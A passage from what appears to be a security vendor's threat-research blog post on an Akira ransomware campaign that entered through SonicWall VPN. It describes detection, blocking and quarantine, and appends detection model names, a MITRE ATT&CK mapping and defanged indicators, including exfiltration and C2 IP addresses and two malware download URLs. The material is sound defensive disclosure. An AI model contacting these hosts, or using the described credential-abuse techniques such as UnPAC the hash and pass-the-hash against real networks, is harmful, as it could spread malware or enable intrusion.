Cyber AI Analyst incident view highlighting multiple unusual events across several devices on August 20. Notably, it includes the “Unusual External Data Transfer” event, which corresponds to the anomalous 2 GB data upload to the known Akira-associated endpoint 66.165.243[.]39.
Figure 8: Cyber AI Analyst incident view highlighting multiple unusual events across several devices on August 20. Notably, it includes the “Unusual External Data Transfer” event, which corresponds to the anomalous 2 GB data upload to the known Akira-associated endpoint 66.165.243[.]39.

Cyber AI Analyst

Throughout the course of the attack, Darktrace’s Cyber AI Analyst autonomously investigated the anomalous activity as it unfolded and correlated related events into a single, cohesive incident. Rather than treating each alert as isolated, Cyber AI Analyst linked them together to reveal the broader narrative of compromise. This holistic view enabled the customer to understand the full scope of the attack, including all associated activities and affected assets that might otherwise have been dismissed as unrelated.

Overview of Cyber AI Analyst’s investigation, correlating all related internal and external security events across affected devices into a single pane of glass.
Figure 9: Overview of Cyber AI Analyst’s investigation, correlating all related internal and external security events across affected devices into a single pane of glass.

Containing the attack

In response to the multiple anomalous activities observed across the network, Darktrace's Autonomous Response initiated targeted mitigation actions to contain the attack. These included:

  • Blocking connections to known malicious or rare external endpoints, such as 137.184.243[.]69, 66.165.243[.]39, and advanced-ip-scanner[.]com.
  • Blocking internal traffic to sensitive ports, including 88 (Kerberos), 3389 (RDP), and 49339 (DCE-RPC), to disrupt lateral movement and credential abuse.
  • Enforcing a block on all outgoing connections from affected devices to contain potential data exfiltration and C2 activity.
Autonomous Response actions taken by Darktrace on an affected device, including the blocking of malicious external endpoints and internal service ports.
Figure 10: Autonomous Response actions taken by Darktrace on an affected device, including the blocking of malicious external endpoints and internal service ports.

Managed Detection and Response

As this customer was an MDR subscriber, multiple Enhanced Monitoring alerts—high-fidelity models designed to detect activity indicative of compromise—were triggered across the network. These alerts prompted immediate investigation by Darktrace’s SOC team.

Upon determining that the activity was likely linked to an Akira ransomware attack, Darktrace analysts swiftly acted to contain the threat. At around 08:05 UTC, devices suspected of being compromised were quarantined, and the customer was promptly notified, enabling them to begin their own remediation procedures without delay.

A wider campaign?

Darktrace’s SOC and Threat Research teams identified at least three additional incidents likely linked to the same campaign. All targeted organizations were based in the US, spanning various industries, and each have indications of using SonicWall VPN, indicating it had likely been targeted for initial access.

Across these incidents, similar patterns emerged. In each case, a suspicious executable named “vmwaretools” was downloaded from the endpoint 85.239.52[.]96 using the user agent “Wget”, bearing some resemblance to the file downloads seen in the incident described here. Data exfiltration was also observed via SSH to the endpoints 107.155.69[.]42 and 107.155.93[.]154, both of which belong to the same ASN also seen in the incident described in this blog: S29802 HVC-AS. Notably, 107.155.93[.]154 has been reported in OSINT as an indicator associated with Akira ransomware activity [15]. Further recent Akira ransomware cases have been observed involving SonicWall VPN, where no similar executable file downloads were observed, but SSH exfiltration to the same ASN was. These overlapping and non-overlapping TTPs may reflect the blurring lines between different affiliates operating under the same RaaS.

Lessons from the campaign

This campaign by Akira ransomware actors underscores the critical importance of maintaining up-to-date patching practices. Threat actors continue to exploit previously disclosed vulnerabilities, not just zero-days, highlighting the need for ongoing vigilance even after patches are released. It also demonstrates how misconfigurations and overlooked weaknesses can be leveraged for initial access or privilege escalation, even in otherwise well-maintained environments.

Darktrace’s observations further reveal that ransomware actors are increasingly relying on legitimate administrative tools, such as WinRM, to blend in with normal network activity and evade detection. In addition to previously documented Kerberos-based credential access techniques like Kerberoasting and pass-the-hash, this campaign featured the use of UnPAC the hash to extract NTLM hashes via PKINIT and U2U authentication for lateral movement or privilege escalation.

Credit to Emily Megan Lim (Senior Cyber Analyst), Vivek Rajan (Senior Cyber Analyst), Ryan Traill (Analyst Content Lead), and Sam Lister (Specialist Security Researcher)

Appendices

Darktrace Model Detections

Anomalous Connection / Active Remote Desktop Tunnel

Anomalous Connection / Data Sent to Rare Domain

Anomalous Connection / New User Agent to IP Without Hostname

Anomalous Connection / Possible Data Staging and External Upload

Anomalous Connection / Rare WinRM Incoming

Anomalous Connection / Rare WinRM Outgoing

Anomalous Connection / Uncommon 1 GiB Outbound

Anomalous Connection / Unusual Admin RDP Session

Anomalous Connection / Unusual Incoming Long Remote Desktop Session

Anomalous Connection / Unusual Incoming Long SSH Session

Anomalous Connection / Unusual Long SSH Session

Anomalous File / EXE from Rare External Location

Anomalous Server Activity / Anomalous External Activity from Critical Network Device

Anomalous Server Activity / Outgoing from Server

Anomalous Server Activity / Rare External from Server

Compliance / Default Credential Usage

Compliance / High Priority Compliance Model Alert

Compliance / Outgoing NTLM Request from DC

Compliance / SSH to Rare External Destination

Compromise / Large Number of Suspicious Successful Connections

Compromise / Sustained TCP Beaconing Activity To Rare Endpoint

Device / Anomalous Certificate Download Activity

Device / Anomalous SSH Followed By Multiple Model Alerts

Device / Anonymous NTLM Logins

Device / Attack and Recon Tools

Device / ICMP Address Scan

Device / Large Number of Model Alerts

Device / Network Range Scan

Device / Network Scan

Device / New User Agent To Internal Server

Device / Possible SMB/NTLM Brute Force

Device / Possible SMB/NTLM Reconnaissance

Device / RDP Scan

Device / Reverse DNS Sweep

Device / Suspicious SMB Scanning Activity

Device / UDP Enumeration

Unusual Activity / Unusual External Data to New Endpoint

Unusual Activity / Unusual External Data Transfer

User / Multiple Uncommon New Credentials on Device

User / New Admin Credentials on Client

User / New Admin Credentials on Server

Enhanced Monitoring Models

Compromise / Anomalous Certificate Download and Kerberos Login

Device / Initial Attack Chain Activity

Device / Large Number of Model Alerts from Critical Network Device

Device / Multiple Lateral Movement Model Alerts

Device / Suspicious Network Scan Activity

Unusual Activity / Enhanced Unusual External Data Transfer

Antigena/Autonomous Response Models

Antigena / Network / External Threat / Antigena File then New Outbound Block

Antigena / Network / External Threat / Antigena Suspicious Activity Block

Antigena / Network / External Threat / Antigena Suspicious File Block

Antigena / Network / Insider Threat / Antigena Large Data Volume Outbound Block

Antigena / Network / Insider Threat / Antigena Network Scan Block

Antigena / Network / Insider Threat / Antigena Unusual Privileged User Activities Block

Antigena / Network / Manual / Quarantine Device

Antigena / Network / Significant Anomaly / Antigena Alerts Over Time Block

Antigena / Network / Significant Anomaly / Antigena Controlled and Model Alert

Antigena / Network / Significant Anomaly / Antigena Enhanced Monitoring from Client Block

Antigena / Network / Significant Anomaly / Antigena Enhanced Monitoring from Server Block

Antigena / Network / Significant Anomaly / Antigena Significant Anomaly from Client Block

Antigena / Network / Significant Anomaly / Antigena Significant Server Anomaly Block

Antigena / Network / Significant Anomaly / Repeated Antigena Alerts

List of Indicators of Compromise (IoCs)

·      66.165.243[.]39 – IP Address – Data exfiltration endpoint

·      107.155.69[.]42 – IP Address – Probable data exfiltration endpoint

·      107.155.93[.]154 – IP Address – Likely Data exfiltration endpoint

·      137.184.126[.]86 – IP Address – Possible C2 endpoint

·      85.239.52[.]96 – IP Address – Likely C2 endpoint

·      hxxp://85.239.52[.]96:8000/vmwarecli  – URL – File download

·      hxxp://137.184.126[.]86:8080/vmwaretools – URL – File download

MITRE ATT&CK Mapping

Initial Access – T1190 – Exploit Public-Facing Application

Reconnaissance – T1590.002 – Gather Victim Network Information: DNS

Reconnaissance – T1590.005 – Gather Victim Network Information: IP Addresses

Reconnaissance – T1592.004 – Gather Victim Host Information: Client Configurations

Reconnaissance – T1595 – Active Scanning

Discovery – T1018 – Remote System Discovery

Discovery – T1046 – Network Service Discovery

Discovery – T1083 – File and Directory Discovery

Discovery – T1135 – Network Share Discovery

Lateral Movement – T1021.001 – Remote Services: Remote Desktop Protocol

Lateral Movement – T1021.004 – Remote Services: SSH

Lateral Movement – T1021.006 – Remote Services: Windows Remote Management

Lateral Movement – T1550.002 – Use Alternate Authentication Material: Pass the Hash

Lateral Movement – T1550.003 – Use Alternate Authentication Material: Pass the Ticket

Credential Access – T1110.001 – Brute Force: Password Guessing

Credential Access – T1649 – Steal or Forge Authentication Certificates

Persistence, Privilege Escalation – T1078 – Valid Accounts

Resource Development – T1588.001 – Obtain Capabilities: Malware

Command and Control – T1071.001 – Application Layer Protocol: Web Protocols

Command and Control – T1105 – Ingress Tool Transfer

Command and Control – T1573 – Encrypted Channel

Collection – T1074 – Data Staged

Exfiltration – T1041 – Exfiltration Over C2 Channel

Exfiltration – T1048 – Exfiltration Over Alternative Protocol

References

[1] https://thehackernews.com/2025/08/sonicwall-investigating-potential-ssl.html

[2] https://www.sonicwall.com/support/notices/gen-7-and-newer-sonicwall-firewalls-sslvpn-recent-threat-activity/250804095336430

[3] https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2024-0015

[4] https://arcticwolf.com/resources/blog/arctic-wolf-observes-akira-ransomware-campaign-targeting-sonicwall-sslvpn-accounts/

[5] https://www.rapid7.com/blog/post/dr-akira-ransomware-group-utilizing-sonicwall-devices-for-initial-access/

[6] https://www.ic3.gov/AnnualReport/Reports/2024_IC3Report.pdf

[7] https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-109a

[8] https://blog.talosintelligence.com/akira-ransomware-continues-to-evolve/

[9] https://www.ransomware.live/map?year=2025&q=akira

[10] https://attack.mitre.org/groups/G1024/
[11] https://labs.lares.com/fear-kerberos-pt2/#UNPAC

[12] https://www.thehacker.recipes/ad/movement/kerberos/unpac-the-hash

[13] https://www.s-rminform.com/latest-thinking/derailing-akira-cyber-threat-intelligence)

[14] https://fieldeffect.com/blog/update-akira-ransomware-group-targets-sonicwall-vpn-appliances

[15] https://arcticwolf.com/resources/blog/arctic-wolf-observes-july-2025-uptick-in-akira-ransomware-activity-targeting-sonicwall-ssl-vpn/

Continue reading
About the author
Emily Megan Lim
Cyber Analyst
Your data. Our AI.
Elevate your network security with Darktrace AI